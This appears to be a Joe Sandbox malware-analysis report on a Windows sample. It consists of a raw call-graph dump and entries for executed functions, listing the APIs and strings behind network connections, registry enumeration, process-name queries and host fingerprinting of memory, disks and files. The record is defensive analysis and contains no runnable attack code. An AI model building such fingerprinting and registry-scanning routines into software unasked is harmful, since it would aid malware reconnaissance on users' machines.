64476 ebff1a 64518 ec0c80 localeconv localeconv 64476->64518 64479 ebf2a3 64477->64479 64492 ebf240 64477->64492 64496 ebf603 64477->64496 64477->64502 64510 ec4f40 localeconv localeconv 64479->64510 64481 ec0045 64483 ec010d 64481->64483 64488 ec004d 64481->64488 64481->64502 64521 ec50a0 localeconv localeconv 64481->64521 64482 ebf80d 64486 ec015e 64483->64486 64522 ec50a0 localeconv localeconv 64483->64522 64485 ec008a 64520 ec4f40 localeconv localeconv 64485->64520 64486->64488 64523 ec50a0 localeconv localeconv 64486->64523 64524 ec4f40 localeconv localeconv 64488->64524 64492->64502 64511 e87310 localeconv localeconv 64492->64511 64495 ebf491 64495->64496 64513 e87310 localeconv localeconv 64495->64513 64496->64476 64496->64481 64496->64482 64496->64485 64499 ec0d30 localeconv localeconv 64496->64499 64508 ec50a0 localeconv localeconv 64496->64508 64516 e8fa50 localeconv localeconv 64496->64516 64517 ec4fd0 localeconv localeconv 64496->64517 64497 ebff5b 64497->64502 64519 ec50a0 localeconv localeconv 64497->64519 64499->64496 64503 ebf3ce 64503->64495 64503->64502 64512 ec50a0 localeconv localeconv 64503->64512 64505 ebf5b9 64515 e8fa50 localeconv localeconv 64505->64515 64507 ebf50d 64507->64502 64507->64505 64514 ec50a0 localeconv localeconv 64507->64514 64508->64496 64510->64502 64511->64503 64512->64495 64513->64507 64514->64505 64515->64496 64516->64496 64517->64496 64518->64497 64519->64502 64520->64502 64521->64483 64522->64486 64523->64488 64524->64502 64525 ec0700 64533 ec0719 64525->64533 64539 ec099d 64525->64539 64528 ec09f6 64536 e875a0 2 API calls 64528->64536 64530 ec09b5 64530->64539 64550 ec50a0 localeconv localeconv 64530->64550 64532 ec0a35 64551 ec4f40 localeconv localeconv 64532->64551 64533->64528 64533->64530 64533->64532 64533->64539 64543 e87310 localeconv localeconv 64533->64543 64544 ebb8e0 localeconv localeconv 64533->64544 64545 eef570 localeconv localeconv 64533->64545 64546 eaeb30 localeconv localeconv 64533->64546 64547 ee13a0 localeconv localeconv 64533->64547 64548 f039a0 localeconv localeconv 64533->64548 64549 eaeae0 localeconv localeconv 64533->64549 64540 ec0a11 64536->64540 64541 e875a0 2 API calls 64540->64541 64541->64539 64543->64533 64544->64533 64545->64533 64546->64533 64547->64533 64548->64533 64549->64533 64550->64539 64551->64539 64137 e91139 64151 ebbaa0 64137->64151 64139 e91148 64140 e91512 64139->64140 64141 e91161 64139->64141 64146 e90f00 64140->64146 64159 e922d0 localeconv localeconv 64140->64159 64141->64146 64155 e90150 64141->64155 64142 e90150 localeconv localeconv 64142->64146 64146->64142 64147 e90f7b 64146->64147 64150 e875a0 localeconv localeconv 64146->64150 64160 ebd4d0 localeconv localeconv 64146->64160 64161 e94940 localeconv localeconv 64146->64161 64162 e93900 localeconv localeconv 64146->64162 64150->64146 64152 ebbb60 64151->64152 64153 ebbac7 64151->64153 64152->64139 64153->64152 64163 ea05b0 localeconv localeconv 64153->64163 64157 e90167 64155->64157 64156 e901c3 64156->64146 64157->64156 64164 e930d0 localeconv localeconv 64157->64164 64159->64146 64160->64146 64161->64146 64162->64146 64163->64152 64164->64156 64165 f34720 64169 f34728 64165->64169 64166 f34733 64168 f34774 64169->64166 64176 f3476c 64169->64176 64177 f35540 closesocket 64169->64177 64171 f3482e 64171->64176 64178 f39270 64171->64178 64173 f34860 64183 f34950 64173->64183 64175 f34878 64176->64175 64189 f330a0 closesocket 64176->64189 64177->64171 64190 f3a440 64178->64190 64180 f392ab 64180->64173 64181 f39297 64181->64180 64221 f3bbe0 closesocket 64181->64221 64185 f34966 64183->64185 64184 f349b9 64186 f34aa0 gethostname 64184->64186 64188 f349c5 64184->64188 64185->64184 64185->64188 64222 f3bbe0 closesocket 64185->64222 64186->64184 64186->64188 64188->64176 64189->64168 64218 f3a46b 64190->64218 64191 f3aa03 RegOpenKeyExA 64192 f3ab70 RegOpenKeyExA 64191->64192 64193 f3aa27 RegQueryValueExA 64191->64193 64196 f3ac34 RegOpenKeyExA 64192->64196 64213 f3ab90 64192->64213 64194 f3aa71 64193->64194 64195 f3aacc RegQueryValueExA 64193->64195 64194->64195 64202 f3aa85 RegQueryValueExA 64194->64202 64198 f3ab66 RegCloseKey 64195->64198 64199 f3ab0e 64195->64199 64197 f3acf8 RegOpenKeyExA 64196->64197 64215 f3ac54 64196->64215 64200 f3ad56 RegEnumKeyExA 64197->64200 64204 f3ad14 64197->64204 64198->64192 64199->64198 64203 f3ab1e RegQueryValueExA 64199->64203 64201 f3ad9b 64200->64201 64200->64204 64205 f3ae16 RegOpenKeyExA 64201->64205 64206 f3aab3 64202->64206 64209 f3ab4c 64203->64209 64204->64181 64207 f3ae34 RegQueryValueExA 64205->64207 64208 f3addf RegEnumKeyExA 64205->64208 64206->64195 64210 f3af43 RegQueryValueExA 64207->64210 64217 f3adaa 64207->64217 64208->64204 64208->64205 64209->64198 64211 f3b052 RegQueryValueExA 64210->64211 64210->64217 64212 f3adc7 RegCloseKey 64211->64212 64211->64217 64212->64208 64213->64196 64214 f3afa0 RegQueryValueExA 64214->64217 64215->64197 64216 f3a4db 64216->64191 64216->64204 64217->64210 64217->64211 64217->64212 64217->64214 64218->64216 64219 f3d190 localeconv localeconv 64218->64219 64220 f3b180 localeconv localeconv 64218->64220 64219->64218 64220->64218 64221->64180 64222->64184 64552 f4b180 64553 f4b19b 64552->64553 64559 f4b2e3 64552->64559 64556 f4b2a9 getsockname 64553->64556 64558 f4b020 closesocket 64553->64558 64553->64559 64560 f4af30 64553->64560 64564 f4b060 64553->64564 64569 f4b020 64556->64569 64558->64553 64561 f4af63 socket 64560->64561 64562 f4af4c 64560->64562 64561->64553 64562->64561 64563 f4af52 64562->64563 64563->64553 64568 f4b080 64564->64568 64565 f4b0b0 connect 64566 f4b0bf WSAGetLastError 64565->64566 64567 f4b0ea 64566->64567 64566->64568 64567->64553 64568->64565 64568->64566 64568->64567 64570 f4b052 64569->64570 64571 f4b029 64569->64571 64570->64553 64572 f4b04b closesocket 64571->64572 64573 f4b03e 64571->64573 64572->64570 64573->64553 64574 f4a080 64577 f49740 64574->64577 64576 f4a09b 64578 f49780 64577->64578 64583 f4975d 64577->64583 64579 f49925 RegOpenKeyExA 64578->64579 64578->64583 64580 f4995a RegQueryValueExA 64579->64580 64584 f49812 64579->64584 64581 f49986 RegCloseKey 64580->64581 64581->64583 64583->64584 64585 f3d190 localeconv localeconv 64583->64585 64584->64576 64585->64583 64586 e8255d 64587 1209f70 64586->64587 64588 e8256c GetSystemInfo 64587->64588 64589 e82589 64588->64589 64590 e825a0 GlobalMemoryStatusEx 64589->64590 64595 e825ec 64590->64595 64591 e8263c GetDriveTypeA 64593 e82655 GetDiskFreeSpaceExA 64591->64593 64591->64595 64592 e82762 64594 e827d6 KiUserCallbackDispatcher 64592->64594 64593->64595 64596 e827f8 64594->64596 64595->64591 64595->64592 64597 e828d9 FindFirstFileW 64596->64597 64598 e82906 FindNextFileW 64597->64598 64599 e82928 64597->64599 64598->64598 64598->64599 64600 e83d5e 64603 e83d30 64600->64603 64602 e83d90 64603->64600 64603->64602 64604 e90ab0 64603->64604 64607 e905b0 64604->64607 64610 e907c7 64607->64610 64614 e905bd 64607->64614 64610->64603 64613 e9066a 64618 e906f0 64613->64618 64620 e907ce 64613->64620 64626 e973b0 localeconv localeconv 64613->64626 64614->64610 64614->64613 64614->64620 64624 e903c0 localeconv localeconv 64614->64624 64625 e97450 localeconv localeconv 64614->64625 64615 e90707 WSAEventSelect 64615->64618 64615->64620 64616 e907ef 64617 e96fa0 4 API calls 64616->64617 64616->64620 64623 e90847 64616->64623 64617->64623 64618->64615 64618->64616 64619 e876a0 3 API calls 64618->64619 64619->64618 64627 e97380 localeconv localeconv 64620->64627 64621 e909e8 WSAEnumNetworkEvents 64622 e909d0 WSAEventSelect 64621->64622 64621->64623 64622->64621 64622->64623 64623->64620 64623->64621 64623->64622 64624->64614 64625->64614 64626->64613 64627->64610 64223 e829ff FindFirstFileA 64224 e82a31 64223->64224 64225 e82a5c RegOpenKeyExA 64224->64225 64226 e82a93 64225->64226 64227 e82ade CharUpperA 64226->64227 64229 e82b0a 64227->64229 64228 e82bf9 QueryFullProcessImageNameA 64230 e82c3b CloseHandle 64228->64230 64229->64228 64232 e82c64 64230->64232 64231 e82df1 CloseHandle 64233 e82e23 64231->64233 64232->64231 64234 e8f7b0 64235 e8f97a 64234->64235 64238 e8f7c3 64234->64238 64236 e90150 2 API calls 64241 e8f854 64236->64241 64238->64235 64238->64236 64239 e8f942 64240 e8f987 64239->64240 64266 ed1390 localeconv localeconv 64239->64266 64267 ed1390 localeconv localeconv 64240->64267 64241->64235 64254 ebcd80 64241->64254 64244 e8f98d 64268 ed1390 localeconv localeconv 64244->64268 64246 e8f9a0 64269 ed1390 localeconv localeconv 64246->64269 64248 e8f9ac 64270 e875a0 64248->64270 64251 e875a0 2 API calls 64252 e8fa12 64251->64252 64253 e875a0 2 API calls 64252->64253 64253->64235 64255 ebd0f1 64254->64255 64262 ebcd9a 64254->64262 64255->64239 64256 ebd0e5 64286 ed1390 localeconv localeconv 64256->64286 64259 ebd016 64285 e9f6c0 7 API calls 64259->64285 64261 ebd018 64284 e97380 localeconv localeconv 64261->64284 64262->64256 64262->64259 64262->64261 64274 ebe130 closesocket localeconv localeconv 64262->64274 64275 e96fa0 64262->64275 64283 e97380 localeconv localeconv 64262->64283 64266->64239 64267->64244 64268->64246 64269->64248 64271 e875aa 64270->64271 64272 e875d1 64270->64272 64271->64272 64287 e872a0 localeconv localeconv 64271->64287 64272->64251 64274->64262 64276 e96feb 64275->64276 64277 e96fd4 64275->64277 64276->64262 64277->64276 64278 e97207 select 64277->64278 64278->64276 64282 e97233 64278->64282 64279 e9726b __WSAFDIsSet 64280 e9729a __WSAFDIsSet 64279->64280 64279->64282 64281 e972ba __WSAFDIsSet 64280->64281 64280->64282 64281->64282 64282->64276 64282->64279 64282->64280 64282->64281 64283->64262 64284->64259 64285->64256 64286->64255 64287->64272 64288 eb95b0 64289 eb95c8 64288->64289 64291 eb95fd 64288->64291 64289->64291 64292 eba150 64289->64292 64293 eba15f 64292->64293 64301 eba246 64292->64301 64294 eba181 getsockname 64293->64294 64293->64301 64295 eba1f7 64294->64295 64297 eba1d0 64294->64297 64305 ebef30 64295->64305 64304 e9d090 localeconv localeconv 64297->64304 64299 eba1eb 64310 ec4f40 localeconv localeconv 64299->64310 64301->64291 64302 eba20f 64302->64301 64309 e9d090 localeconv localeconv 64302->64309 64304->64299 64306 ebefa8 64305->64306 64308 ebef47 64305->64308 64306->64308 64311 e8c960 localeconv localeconv 64306->64311 64308->64302 64309->64299 64310->64301 64311->64308 64628 eb8b50 64629 eb8b6b 64628->64629 64630 eb8be6 64628->64630 64629->64630 64631 eb8b8f 64629->64631 64632 eb8bf3 64629->64632 64718 e96e40 select __WSAFDIsSet __WSAFDIsSet __WSAFDIsSet 64631->64718 64661 eba550 64632->64661 64636 eb8ba1 64637 eb8cd9 SleepEx 64636->64637 64649 eb8bb5 64636->64649 64659 eb8cb2 64636->64659 64643 eb8d13 64637->64643 64638 eba150 3 API calls 64647 eb8dff 64638->64647 64639 eb8c1f connect 64640 eb8c35 64639->64640 64646 eba150 3 API calls 64640->64646 64641 eb8e85 64641->64630 64645 eb8eae 64641->64645 64724 e92a00 localeconv localeconv 64641->64724 64648 eb8d43 64643->64648 64643->64659 64645->64630 64725 e878b0 closesocket 64645->64725 64657 eb8c4d 64646->64657 64647->64641 64722 e9d090 localeconv localeconv 64647->64722 64654 eba150 3 API calls 64648->64654 64649->64630 64720 ec50a0 localeconv localeconv 64649->64720 64650 eb8c8b 64650->64636 64653 eb8dc8 64650->64653 64721 ebb100 localeconv localeconv 64653->64721 64654->64649 64655 eb8e67 64723 ec4fd0 localeconv localeconv 64655->64723 64657->64650 64719 ec50a0 localeconv localeconv 64657->64719 64659->64630 64659->64638 64659->64641 64662 eba575 64661->64662 64664 eba597 64662->64664 64729 e875e0 64662->64729 64665 ebef30 2 API calls 64664->64665 64709 eba6d9 64664->64709 64667 eba63a 64665->64667 64666 eba709 64668 e878b0 3 API calls 64666->64668 64675 eba713 64666->64675 64673 eba641 64667->64673 64677 eba69b 64667->64677 64668->64675 64669 eb8bfc 64669->64630 64669->64639 64669->64640 64669->64659 64671 eba7e5 64676 eba811 setsockopt 64671->64676 64681 eba87c 64671->64681 64691 eba8ee 64671->64691 64673->64671 64746 ec4fd0 localeconv localeconv 64673->64746 64675->64669 64745 ec50a0 localeconv localeconv 64675->64745 64676->64681 64684 eba83b 64676->64684 64742 e9d090 localeconv localeconv 64677->64742 64679 eba6c9 64743 ec4f40 localeconv localeconv 64679->64743 64681->64691 64749 ebb1e0 localeconv localeconv 64681->64749 64684->64681 64747 e9d090 localeconv localeconv 64684->64747 64685 ebaf56 64687 ebaf5d 64685->64687 64685->64709 64687->64675 64690 eba150 3 API calls 64687->64690 64688 eba86d 64748 ec4fd0 localeconv localeconv 64688->64748 64690->64675 64692 ebabb9 64691->64692 64694 ebacb8 64691->64694 64695 ebae32 64691->64695 64702 ebaf33 64691->64702 64691->64709 64711 ebabe1 64691->64711 64697 ebad45 64692->64697 64699 ebade6 64692->64699 64692->64711 64751 eb6be0 7 API calls 64692->64751 64693 ebb056 64759 e9d090 localeconv localeconv 64693->64759 64694->64692 64704 ebacdc 64694->64704 64694->64709 64695->64692 64756 ec4fd0 localeconv localeconv 64695->64756 64696 ebaf03 64696->64702 64757 ec4fd0 localeconv localeconv 64696->64757 64697->64699 64712 ebad5f 64697->64712 64754 e9d090 localeconv localeconv 64699->64754 64741 ee67e0 ioctlsocket 64702->64741 64750 e9d090 localeconv localeconv 64704->64750 64705 ebb07b 64760 ec4f40 localeconv localeconv 64705->64760 64709->64666 64709->64675 64744 e92a00 localeconv localeconv 64709->64744 64711->64693 64711->64696 64711->64709 64758 ec4fd0 localeconv localeconv 64711->64758 64713 ebadb7 64712->64713 64752 ec4fd0 localeconv localeconv 64712->64752 64753 ed3030 localeconv localeconv 64713->64753 64714 ebad01 64755 ec4f40 localeconv localeconv 64714->64755 64718->64636 64719->64650 64720->64630 64721->64659 64722->64655 64723->64641 64724->64645 64726 e878d7 64725->64726 64727 e878c5 64725->64727 64726->64630 64764 e872a0 localeconv localeconv 64727->64764 64730 e875ef 64729->64730 64731 e87607 socket 64729->64731 64730->64731 64734 e87601 64730->64734 64735 e87643 64730->64735 64732 e8762b 64731->64732 64733 e8763a 64731->64733 64761 e872a0 localeconv localeconv 64732->64761 64733->64664 64734->64731 64762 e872a0 localeconv localeconv 64735->64762 64738 e87654 64763 e8cb20 localeconv localeconv 64738->64763 64740 e87674 64740->64664 64741->64685 64742->64679 64743->64709 64744->64666 64745->64669 64746->64671 64747->64688 64748->64681 64749->64691 64750->64714 64751->64697 64752->64713 64753->64711 64754->64714 64755->64709 64756->64692 64757->64702 64758->64711 64759->64705 64760->64709 64761->64733 64762->64738 64763->64740 64764->64726 64765 e831d7 64768 e831f4 64765->64768 64766 e83200 64767 e832dc CloseHandle 64767->64766 64768->64766 64768->64767 64769 e82f17 64778 e82f2c 64769->64778 64770 e831d3 64773 e8315c RegEnumKeyExA 64773->64778 64774 e81619 2 API calls 64775 e83046 RegOpenKeyExA 64774->64775 64776 e83089 RegQueryValueExA 64775->64776 64775->64778 64777 e8313b RegCloseKey 64776->64777 64776->64778 64777->64778 64778->64770 64778->64773 64778->64774 64778->64777 64779 e81619 64778->64779 64780 1211360 2 API calls 64779->64780 64781 e81645 RegOpenKeyExA 64780->64781 64781->64778

                                  Executed Functions

                                  Function 00EBF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                  • API String ID: 0-1590685507
                                  • Opcode ID: 27f0b6ca557cec22aea8267792227a0629519669bc5b6f8c1ba433c798025b43
                                  • Instruction ID: 939c5200141cf64bdb30a945c06d0cbdb4f372238e472722a5f3ed0ffbc17abc
                                  • Opcode Fuzzy Hash: 27f0b6ca557cec22aea8267792227a0629519669bc5b6f8c1ba433c798025b43
                                  • Instruction Fuzzy Hash: CDC2C131A043459FD714CF29C980BABB7E1BF84318F05966DEC98AB262D771ED85CB81
                                  Function 00E8255D Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 282fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSystemInfo.KERNELBASE ref: 00E82579
                                  • GlobalMemoryStatusEx.KERNELBASE ref: 00E825CC
                                  • GetDriveTypeA.KERNELBASE ref: 00E82647
                                  • GetDiskFreeSpaceExA.KERNELBASE ref: 00E8267E
                                  • KiUserCallbackDispatcher.NTDLL ref: 00E827E2
                                  • FindFirstFileW.KERNELBASE ref: 00E828F8
                                  • FindNextFileW.KERNELBASE ref: 00E8291F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                  • String ID: ;%$@$`
                                  • API String ID: 3271271169-3130814153
                                  • Opcode ID: 1ac1dbda903e1ad5aa06420a2dad17deb73742506667434efb4353e3ccf703f7
                                  • Instruction ID: e35e44d7b6453e2462808522644dcb0d9e26e5ccf139fd2bfffd70c993ec3543
                                  • Opcode Fuzzy Hash: 1ac1dbda903e1ad5aa06420a2dad17deb73742506667434efb4353e3ccf703f7
                                  • Instruction Fuzzy Hash: 2AD1B5B49057199FCB10EFA8C59469EBBF0BF48348F01896DE898D7341E7749A84CF92
                                  Function 00E829FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1271 e829ff-e82a2f FindFirstFileA 1272 e82a38 1271->1272 1273 e82a31-e82a36 1271->1273 1274 e82a3d-e82a91 call 1309c50 call 1309ce0 RegOpenKeyExA 1272->1274 1273->1274 1279 e82a9a 1274->1279 1280 e82a93-e82a98 1274->1280 1281 e82a9f-e82b0c call 1309c50 call 1309ce0 CharUpperA call 1208da0 1279->1281 1280->1281 1289 e82b0e-e82b13 1281->1289 1290 e82b15 1281->1290 1291 e82b1a-e82b92 call 1309c50 call 1309ce0 call 1208e80 call 1208e70 1289->1291 1290->1291 1300 e82bcc-e82c66 QueryFullProcessImageNameA CloseHandle call 1208da0 1291->1300 1301 e82b94-e82ba3 1291->1301 1311 e82c68-e82c6d 1300->1311 1312 e82c6f 1300->1312 1304 e82bb0-e82bca call 1208e68 1301->1304 1305 e82ba5-e82bae 1301->1305 1304->1300 1304->1301 1305->1300 1313 e82c74-e82ce9 call 1309c50 call 1309ce0 call 1208e80 call 1208e70 1311->1313 1312->1313 1322 e82dcf-e82e1c call 1309c50 call 1309ce0 CloseHandle 1313->1322 1323 e82cef-e82d49 call 1208bb0 call 1208da0 1313->1323 1333 e82e23-e82e2e 1322->1333 1334 e82d99-e82dad 1323->1334 1335 e82d4b-e82d63 call 1208da0 1323->1335 1336 e82e30-e82e35 1333->1336 1337 e82e37 1333->1337 1334->1322 1335->1334 1343 e82d65-e82d7d call 1208da0 1335->1343 1339 e82e3c-e82ed6 call 1309c50 call 1309ce0 1336->1339 1337->1339 1352 e82ed8-e82ee1 1339->1352 1353 e82eea 1339->1353 1343->1334 1349 e82d7f-e82d97 call 1208da0 1343->1349 1349->1334 1357 e82daf-e82dc9 call 1208e68 1349->1357 1352->1353 1355 e82ee3-e82ee8 1352->1355 1356 e82eef-e82f16 call 1309c50 call 1309ce0 1353->1356 1355->1356 1357->1322 1357->1323
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1485562959.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                  • Associated: 00000003.00000002.1485531423.0000000000E80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.00000000013F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001557000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1485562959.0000000001559000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486609474.000000000155C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.000000000155E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000016E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000017FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.0000000001805000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1486687877.00000000018FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487183382.00000000018FB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487494108.0000000001ABC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000003.00000002.1487568457.0000000001ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_e80000_w6cYYyWXqJ.jbxd
                                  Similarity
                                  • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                  • String ID: 0
                                  • API String ID: 2406880114-4108050209
                                  • Opcode ID: 3872892c3504e6750cc44f7872ad4ed2e03b16a12fe69080642a1e022da89a79
                                  • Instruction ID: e9cd2d65744421022513c7cc3b30f3b99d3bb8f20897a900b8a931657164633f
                                  • Opcode Fuzzy Hash: 3872892c3504e6750cc44f7872ad4ed2e03b16a12fe69080642a1e022da89a79
                                  • Instruction Fuzzy Hash: E3E1D7B99057059FCB10EF68D98469EBBF4BF48308F40896DE998DB344E7749988CF42
                                  Function 00E905B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1511 e905b0-e905b7 1512 e905bd-e905d4 1511->1512 1513 e907ee 1511->1513 1514 e905da-e905e6 1512->1514 1515 e907e7-e907ed 1512->1515 1514->1515 1516 e905ec-e905f0 1514->1516 1515->1513 1517 e907c7-e907cc 1516->1517 1518 e905f6-e90620 call e97350 call e870b0 1516->1518 1517->1515 1523 e9066a-e9068c call ebdec0 1518->1523 1524 e90622-e90624 1518->1524 1530 e90692-e906a0 1523->1530 1531 e907d6-e907e3 call e97380 1523->1531 1525 e90630-e90655 call e870d0 call e903c0 call e97450 1524->1525 1551 e9065b-e90668 call e870e0 1525->1551 1552 e907ce 1525->1552 1534 e906a2-e906a4 1530->1534 1535 e906f4-e906f6 1530->1535 1531->1515 1536 e906b0-e906e4 call e973b0 1534->1536 1538 e906fc-e906fe 1535->1538 1539 e907ef-e9082b call e93000 1535->1539 1536->1531 1550 e906ea-e906ee 1536->1550 1543 e9072c-e90754 1538->1543 1555 e90a2f-e90a35 1539->1555 1556 e90831-e90837 1539->1556 1547 e9075f-e9078b 1543->1547 1548 e90756-e9075b 1543->1548 1566 e90791-e90796 1547->1566 1567 e90700-e90703 1547->1567 1553 e9075d 1548->1553 1554 e90707-e90719 WSAEventSelect 1548->1554 1550->1536 1560 e906f0 1550->1560 1551->1523 1551->1525 1552->1531 1565 e90723-e90726 1553->1565 1554->1531 1564 e9071f 1554->1564 1561 e90a3c-e90a52 1555->1561 1562 e90a37-e90a3a 1555->1562 1558 e90839-e9084c call e96fa0 1556->1558 1559 e90861-e9087e 1556->1559 1576 e90a9c-e90aa4 1558->1576 1577 e90852 1558->1577 1578 e90882-e9088d 1559->1578 1560->1535 1561->1531 1569 e90a58-e90a81 call e92f10 1561->1569 1562->1561 1564->1565 1565->1539 1565->1543 1566->1567 1571 e9079c-e907c2 call e876a0 1566->1571 1567->1554 1569->1531 1584 e90a87-e90a97 call e96df0 1569->1584 1571->1567 1576->1531 1577->1559 1581 e90854-e9085f 1577->1581 1582 e90970-e90975 1578->1582 1583 e90893-e908b1 1578->1583 1581->1578 1585 e90a19-e90a2c 1582->1585 1586 e9097b-e90989 call e870b0 1582->1586 1587 e908c8-e908f7 1583->1587 1584->1531 1585->1555 1586->1585 1594 e9098f-e9099e 1586->1594 1595 e908f9-e908fb 1587->1595 1596 e908fd-e90925 1587->1596 1598 e909b0-e909c1 call e870d0 1594->1598 1597 e90928-e9093f 1595->1597 1596->1597 1602 e908b3-e908c2 1597->1602 1603 e90945-e9096b 1597->1603 1604 e909a0-e909ae call e870e0 1598->1604 1605 e909c3-e909c7 1598->1605 1602->1582 1602->1587 1603->1602 1604->1585 1604->1598 1606 e909e8-e90a03 WSAEnumNetworkEvents 1605->1606 1608 e909d0-e909e6 WSAEventSelect 1606->1608 1609 e90a05-e90a17 1606->1609 1608->1604 1608->1606 1609->1608
                                  APIs
                                  • WSAEventSelect.WS2_32(?,?,?), ref: 00E90711
                                  • WSAEventSelect.WS2_32(?,?,00000000), ref: 00E909DD
                                  • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 00E909FC
                                  Strings
                                  Memory Dump Source
